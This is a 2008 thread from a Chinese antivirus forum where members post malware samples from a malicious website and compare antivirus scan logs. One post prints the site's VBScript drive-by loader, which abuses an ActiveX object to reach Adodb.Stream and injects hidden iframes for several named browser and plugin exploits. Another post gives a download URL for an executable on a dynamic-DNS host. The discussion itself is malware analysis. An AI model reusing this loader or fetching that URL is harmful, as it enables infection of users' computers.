
[Verified] Malicious website

moonsilver
Posted on 2008-1-25 14:09:25
tonger2003
Posted on 2008-1-25 14:15:00
Microsoft.rar (3.33 KB, downloads: 240)
冷冷
Posted on 2008-1-25 14:23:08

I:\virus\test\Microsoft.com - Suspect code-parts found (Level: 160)

        1 File scanned
          (0 Archives with 0 files)
        0 Signatures found
        1 Suspect code-part found
        Used time: 0:00.000
1.PNG

SAMPLE-12.rar (204.16 KB, downloads: 290)
llgiggs
Posted on 2008-1-25 14:27:56




[ Last edited by llgiggs on 2008-1-25 14:29 ]
1.PNG
solcroft
Posted on 2008-1-25 14:34:43
opera0day... mcafee_exploit... those are some pretty impressive names
<html>
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
  err.clear
  document.write ("<iframe src=06014.htm width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=baidu.htm width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=cookie.htm width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=jet.htm width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=McAfee_exploit.html width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=opera0day.htm width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=qvod.htm width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=realplay_071122_exp.html width=100% height=100% scrolling=no frameborder=0>")
  document.write ("<iframe src=xunleikankan.html width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
</html>
kkgh
Posted on 2008-1-25 14:48:37
已扫描的磁盘,文件夹及文件:C:\Documents and Settings\zh\桌面\SAMPLE-12.rar
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar >>RAR >>setup.exe - 可能是 Win32/Genetik 木马 的一个变种
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar >>RAR >>setup_unpacked.exe - 可能是 Win32/Genetik 木马 的一个变种
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar - 可能是 Win32/Genetik 木马 的一个变种 - 已隔离 - 已删除
已扫描的文件数目:3
已发现的病毒数目:2
已清除病毒的文件数目:1
完成时间: 14:53:18 总扫描时间:2 秒 (00:00:02)
mofunzone
Posted on 2008-1-25 14:48:44
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\Microsoft.rar'
C:\Documents and Settings\Administrator\My Documents\
  Microsoft.rar
    [0] Archive type: RAR
      --> Microsoft.com
        [1] Archive type: Runtime Packed
        --> Object
      [WARNING]   The file was ignored!
  Microsoft.rar:Zone.Identifier


End of the scan: 2008年1月24日  22:47
Used time: 00:05 min

The scan has been done completely.

      0 Scanning directories
      3 Files were scanned
      0 viruses and/or unwanted programs were found
      1 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      3 Files not concerned
      1 Archives were scanned
      1 Warnings
      0 Notes
tanlimo
Posted on 2008-1-25 14:52:14
I'd really like to know the decryption process, not just the result.

http://caob521.3322.org/down/lz.exe

[ Last edited by tanlimo on 2008-1-25 15:57 ]

lz.rar

2.21 KB, downloads: 251

傻猪猪米走鸡
Posted on 2008-1-25 15:27:16
E:\virus\Microsoft.rar » RAR » Microsoft.com » FSG v2.0 - is OK
E:\virus\SAMPLE-12.rar » RAR » setup.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object
E:\virus\SAMPLE-12.rar » RAR » setup_unpacked.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object
E:\virus\SAMPLE-12.rar - probably a variant of Win32/Genetik trojan - deleted - quarantined
傻猪猪米走鸡
Posted on 2008-1-25 15:28:51
2008-1-25 15:33:28        Kernel        File  'E:\virus\Microsoft.rar' was sent to ESET for analysis.
Copyright © KaFan  KaFan.cn All Rights Reserved.